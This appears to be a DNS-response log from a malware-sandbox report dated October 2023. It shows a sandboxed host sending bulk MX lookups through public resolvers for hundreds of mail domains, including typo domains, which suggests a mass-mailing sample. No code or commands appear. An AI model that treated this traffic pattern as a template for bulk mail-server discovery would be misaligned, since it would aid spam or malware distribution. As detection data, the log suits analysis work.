                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.558993101 CEST1.1.1.1192.168.2.30x804aNo error (0)dowser.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.558993101 CEST1.1.1.1192.168.2.30x804aNo error (0)dowser.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.558993101 CEST1.1.1.1192.168.2.30x804aNo error (0)dowser.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.558993101 CEST1.1.1.1192.168.2.30x804aNo error (0)dowser.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.560388088 CEST8.8.4.4192.168.2.30xd84bNo error (0)jardiland.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.560388088 CEST8.8.4.4192.168.2.30xd84bNo error (0)jardiland.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.567512989 CEST8.8.8.8192.168.2.30xd84bNo error (0)networkvenezuela.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.569154978 CEST8.8.8.8192.168.2.30xaf4aNo error (0)resumesrv.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.577275038 CEST208.67.220.220192.168.2.30xe74bNo error (0)bisok.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.577275038 CEST208.67.220.220192.168.2.30xe74bNo error (0)bisok.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.577702999 CEST8.8.8.8192.168.2.30xe74bNo error (0)uber.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.577702999 CEST8.8.8.8192.168.2.30xe74bNo error (0)uber.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.577702999 CEST8.8.8.8192.168.2.30xe74bNo error (0)uber.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.577702999 CEST8.8.8.8192.168.2.30xe74bNo error (0)uber.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.577702999 CEST8.8.8.8192.168.2.30xe74bNo error (0)uber.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.584364891 CEST149.112.112.112192.168.2.30xe74bNo error (0)adler-lacke.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.584378004 CEST208.67.222.222192.168.2.30xf74bNo error (0)icoud.com591565.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.584927082 CEST1.0.0.1192.168.2.30xce4aNo error (0)24.com.esMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.586131096 CEST8.8.4.4192.168.2.30xaf4aNo error (0)bvcaa.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.586131096 CEST8.8.4.4192.168.2.30xaf4aNo error (0)bvcaa.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.586479902 CEST8.8.4.4192.168.2.30xbe4aNo error (0)paragon-are.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.586479902 CEST8.8.4.4192.168.2.30xbe4aNo error (0)paragon-are.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.586479902 CEST8.8.4.4192.168.2.30xbe4aNo error (0)paragon-are.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.591001034 CEST8.8.8.8192.168.2.30x514aNo error (0)globcom.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.591700077 CEST8.8.8.8192.168.2.30xf74bNo error (0)orcon.net.nzMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.591700077 CEST8.8.8.8192.168.2.30xf74bNo error (0)orcon.net.nzMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.591700077 CEST8.8.8.8192.168.2.30xf74bNo error (0)orcon.net.nzMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.591700077 CEST8.8.8.8192.168.2.30xf74bNo error (0)orcon.net.nzMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.592734098 CEST208.67.222.222192.168.2.30xc84bNo error (0)zippymail.infoMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.595988035 CEST9.9.9.9192.168.2.30xf74bNo error (0)tph.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.601710081 CEST1.0.0.1192.168.2.30x9f4aNo error (0)trinom.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.603446960 CEST1.1.1.1192.168.2.30xd84bNo error (0)socket.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.603446960 CEST1.1.1.1192.168.2.30xd84bNo error (0)socket.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.603446960 CEST1.1.1.1192.168.2.30xd84bNo error (0)socket.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.603446960 CEST1.1.1.1192.168.2.30xd84bNo error (0)socket.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.603446960 CEST1.1.1.1192.168.2.30xd84bNo error (0)socket.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.603446960 CEST1.1.1.1192.168.2.30xd84bNo error (0)socket.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.603446960 CEST1.1.1.1192.168.2.30xd84bNo error (0)socket.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.603693008 CEST208.67.220.220192.168.2.30xd84bNo error (0)quest-global.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.603693008 CEST208.67.220.220192.168.2.30xd84bNo error (0)quest-global.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.606977940 CEST8.8.8.8192.168.2.30xe74bNo error (0)vladuz.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.608854055 CEST115.112.230.148192.168.2.30x324aNo error (0)indorama-ind.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.608854055 CEST115.112.230.148192.168.2.30x324aNo error (0)indorama-ind.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.610044003 CEST208.67.222.222192.168.2.30x904aNo error (0)travelpack.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.610044003 CEST208.67.222.222192.168.2.30x904aNo error (0)travelpack.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.610044003 CEST208.67.222.222192.168.2.30x904aNo error (0)travelpack.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.610044003 CEST208.67.222.222192.168.2.30x904aNo error (0)travelpack.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.610044003 CEST208.67.222.222192.168.2.30x904aNo error (0)travelpack.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.613451004 CEST208.67.222.222192.168.2.30xaf4aNo error (0)tivejo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.625375032 CEST208.67.220.220192.168.2.30xc84bNo error (0)sgcm.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.626617908 CEST208.67.220.220192.168.2.30xc84bNo error (0)fallsburgny.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.626617908 CEST208.67.220.220192.168.2.30xc84bNo error (0)fallsburgny.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.633481979 CEST208.67.222.222192.168.2.30xf74bNo error (0)oulook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.638185978 CEST1.1.1.1192.168.2.30xbe4aName error (3)4mail.topnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.638964891 CEST9.9.9.9192.168.2.30xe74bNo error (0)linder.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.638964891 CEST9.9.9.9192.168.2.30xe74bNo error (0)linder.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.648761988 CEST8.8.8.8192.168.2.30xf74bNo error (0)asl.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.648761988 CEST8.8.8.8192.168.2.30xf74bNo error (0)asl.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.648761988 CEST8.8.8.8192.168.2.30xf74bNo error (0)asl.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.648761988 CEST8.8.8.8192.168.2.30xf74bNo error (0)asl.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.665503979 CEST1.0.0.1192.168.2.30xe74bNo error (0)gunit.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.669286966 CEST1.0.0.1192.168.2.30xce4aNo error (0)eamil.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.690186977 CEST1.1.1.1192.168.2.30x514aNo error (0)crosstech.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.701503992 CEST9.9.9.9192.168.2.30xbe4aNo error (0)tc-sm.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.701503992 CEST9.9.9.9192.168.2.30xbe4aNo error (0)tc-sm.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.701503992 CEST9.9.9.9192.168.2.30xbe4aNo error (0)tc-sm.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.709805965 CEST1.1.1.1192.168.2.30x3ffaNo error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.709805965 CEST1.1.1.1192.168.2.30x3ffaNo error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.709805965 CEST1.1.1.1192.168.2.30x3ffaNo error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.714323044 CEST149.112.112.112192.168.2.30xaf4aNo error (0)glasslam-asia.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.717293024 CEST208.67.220.220192.168.2.30xd84bNo error (0)hotpop.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.719230890 CEST1.1.1.1192.168.2.30x614aNo error (0)bvision.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.730124950 CEST1.1.1.1192.168.2.30x704aNo error (0)culver.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.732378006 CEST1.1.1.1192.168.2.30x804aNo error (0)hotmial.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.736639977 CEST8.8.4.4192.168.2.30x514aNo error (0)immobiliarepunto.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.761513948 CEST9.9.9.9192.168.2.30xf74bNo error (0)2980.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.761755943 CEST8.8.4.4192.168.2.30xf74bNo error (0)lianhuistone.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.767863035 CEST8.8.8.8192.168.2.30xf74bNo error (0)soluzioni-sw.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.835491896 CEST208.67.220.220192.168.2.30x9f4aNo error (0)evoe.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.836004972 CEST1.1.1.1192.168.2.30xc84bNo error (0)nomatech.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.882855892 CEST162.159.26.136192.168.2.30xa4eNo error (0)c1oramn.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.882855892 CEST162.159.26.136192.168.2.30xa4eNo error (0)c1oramn.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.894884109 CEST156.154.132.200192.168.2.30x1a4eNo error (0)cfremails.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.904036045 CEST1.1.1.1192.168.2.30x704aNo error (0)fojab.seMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.904036045 CEST1.1.1.1192.168.2.30x704aNo error (0)fojab.seMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.929896116 CEST1.1.1.1192.168.2.30xfe26No error (0)ns-203.awsdns-25.com205.251.192.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.942747116 CEST9.9.9.9192.168.2.30xd84bNo error (0)ocel.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.942747116 CEST9.9.9.9192.168.2.30xd84bNo error (0)ocel.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.942747116 CEST9.9.9.9192.168.2.30xd84bNo error (0)ocel.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.942747116 CEST9.9.9.9192.168.2.30xd84bNo error (0)ocel.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.949202061 CEST208.67.222.222192.168.2.30xf74bNo error (0)nsbuechner.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.951931953 CEST208.67.220.220192.168.2.30xce4aNo error (0)virglio.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.954473972 CEST192.99.158.245192.168.2.30xa4eNo error (0)emial.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.957454920 CEST1.1.1.1192.168.2.30x904aNo error (0)nn.hrMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.965475082 CEST208.67.222.222192.168.2.30x614aNo error (0)beeld.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.965475082 CEST208.67.222.222192.168.2.30x614aNo error (0)beeld.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.981112957 CEST1.0.0.1192.168.2.30xc84bNo error (0)kudrlicka.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.981112957 CEST1.0.0.1192.168.2.30xc84bNo error (0)kudrlicka.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:41.993150949 CEST208.67.220.220192.168.2.30xaf4aNo error (0)torba.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.032073975 CEST8.8.8.8192.168.2.30x414aNo error (0)linochaves.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.055972099 CEST1.1.1.1192.168.2.30xb1b2No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.079602957 CEST1.0.0.1192.168.2.30xd84bNo error (0)2max.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.079602957 CEST1.0.0.1192.168.2.30xd84bNo error (0)2max.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.138686895 CEST1.1.1.1192.168.2.30x20a9No error (0)piotr.ns.cloudflare.com108.162.193.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.138686895 CEST1.1.1.1192.168.2.30x20a9No error (0)piotr.ns.cloudflare.com172.64.33.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.138686895 CEST1.1.1.1192.168.2.30x20a9No error (0)piotr.ns.cloudflare.com173.245.59.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.220191956 CEST9.9.9.9192.168.2.30xaf4aNo error (0)gsl-th.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.232074976 CEST1.1.1.1192.168.2.30x2ca2No error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.233958960 CEST1.0.0.1192.168.2.30x704aNo error (0)rustici.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.233958960 CEST1.0.0.1192.168.2.30x704aNo error (0)rustici.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.303996086 CEST108.162.193.222192.168.2.30x9a50No error (0)dcdi.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.353210926 CEST108.162.192.110192.168.2.30xc351No error (0)mx.moakt.com64.31.33.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.385188103 CEST199.19.56.1192.168.2.30xb451Name error (3)lbindustries.orgnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.412851095 CEST64.68.192.10192.168.2.30xd351No error (0)avivadirectory.com199.188.204.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.530327082 CEST8.8.8.8192.168.2.30x6f52No error (0)coe.intMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.530327082 CEST8.8.8.8192.168.2.30x6f52No error (0)coe.intMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.543605089 CEST210.124.234.15192.168.2.30xe351No error (0)mail.dbins.net210.124.234.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.551764965 CEST8.8.4.4192.168.2.30x8e52No error (0)eslite.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.554979086 CEST9.9.9.9192.168.2.30x9e52No error (0)p33.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.554979086 CEST9.9.9.9192.168.2.30x9e52No error (0)p33.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.568269968 CEST1.1.1.1192.168.2.30xae52No error (0)spray.seMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.568269968 CEST1.1.1.1192.168.2.30xae52No error (0)spray.seMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.568269968 CEST1.1.1.1192.168.2.30xae52No error (0)spray.seMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.573880911 CEST208.67.222.222192.168.2.30xae52No error (0)deepakfasteners.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.577502966 CEST8.8.8.8192.168.2.30xae52No error (0)adorfon.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.580323935 CEST8.8.8.8192.168.2.30xae52No error (0)binarysecuritysolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.580323935 CEST8.8.8.8192.168.2.30xae52No error (0)binarysecuritysolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.580323935 CEST8.8.8.8192.168.2.30xae52No error (0)binarysecuritysolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.587529898 CEST208.67.220.220192.168.2.30xb753Name error (3)oranek.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.589481115 CEST1.0.0.1192.168.2.30xb753No error (0)modeinfo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.589481115 CEST1.0.0.1192.168.2.30xb753No error (0)modeinfo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.592592955 CEST8.8.8.8192.168.2.30xb753No error (0)gaml.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.593144894 CEST8.8.8.8192.168.2.30xb753No error (0)songwriter.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.593144894 CEST8.8.8.8192.168.2.30xb753No error (0)songwriter.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.595465899 CEST8.8.4.4192.168.2.30xbd52No error (0)dnsdeer.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.595465899 CEST8.8.4.4192.168.2.30xbd52No error (0)dnsdeer.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.598162889 CEST8.8.4.4192.168.2.30x8e52No error (0)247virtualassistant.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.607820034 CEST208.67.220.220192.168.2.30x9e52No error (0)pelicanhill.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.607820034 CEST208.67.220.220192.168.2.30x9e52No error (0)pelicanhill.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.611171961 CEST8.8.8.8192.168.2.30xc753No error (0)indorama-ind.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.611171961 CEST8.8.8.8192.168.2.30xc753No error (0)indorama-ind.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.611573935 CEST1.1.1.1192.168.2.30xd50dNo error (0)yasuma.com61.200.81.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.621274948 CEST8.8.4.4192.168.2.30xc753No error (0)victoriamansion.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.636291027 CEST1.1.1.1192.168.2.30xc753No error (0)rjii.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.636291027 CEST1.1.1.1192.168.2.30xc753No error (0)rjii.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.636775970 CEST208.67.222.222192.168.2.30xae52No error (0)hvhs.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.636775970 CEST208.67.222.222192.168.2.30xae52No error (0)hvhs.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.645236969 CEST208.67.222.222192.168.2.30xc753No error (0)rentinriga.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.663464069 CEST208.67.220.220192.168.2.30x9e52No error (0)graystoneventures.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.674446106 CEST8.8.4.4192.168.2.30xc753No error (0)iaxs.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.674446106 CEST8.8.4.4192.168.2.30xc753No error (0)iaxs.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.674446106 CEST8.8.4.4192.168.2.30xc753No error (0)iaxs.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.674446106 CEST8.8.4.4192.168.2.30xc753No error (0)iaxs.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.695641994 CEST9.9.9.9192.168.2.30xb753No error (0)rightstartmortgage.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.706564903 CEST1.1.1.1192.168.2.30xae52No error (0)logicsupport.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.710369110 CEST149.112.112.112192.168.2.30x9e52No error (0)omicronlambda.ezbunko.topMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.710369110 CEST149.112.112.112192.168.2.30x9e52No error (0)omicronlambda.ezbunko.topMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.725373983 CEST149.112.112.112192.168.2.30x9e52No error (0)ferdinand.rsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.725373983 CEST149.112.112.112192.168.2.30x9e52No error (0)ferdinand.rsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.725373983 CEST149.112.112.112192.168.2.30x9e52No error (0)ferdinand.rsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.725373983 CEST149.112.112.112192.168.2.30x9e52No error (0)ferdinand.rsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.725373983 CEST149.112.112.112192.168.2.30x9e52No error (0)ferdinand.rsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.731726885 CEST9.9.9.9192.168.2.30xce4aNo error (0)spetema.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.744259119 CEST1.1.1.1192.168.2.30xae52No error (0)svitonline.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.744259119 CEST1.1.1.1192.168.2.30xae52No error (0)svitonline.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.744259119 CEST1.1.1.1192.168.2.30xae52No error (0)svitonline.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.744259119 CEST1.1.1.1192.168.2.30xae52No error (0)svitonline.comMX (Mail exchange)IN (0x0001)false
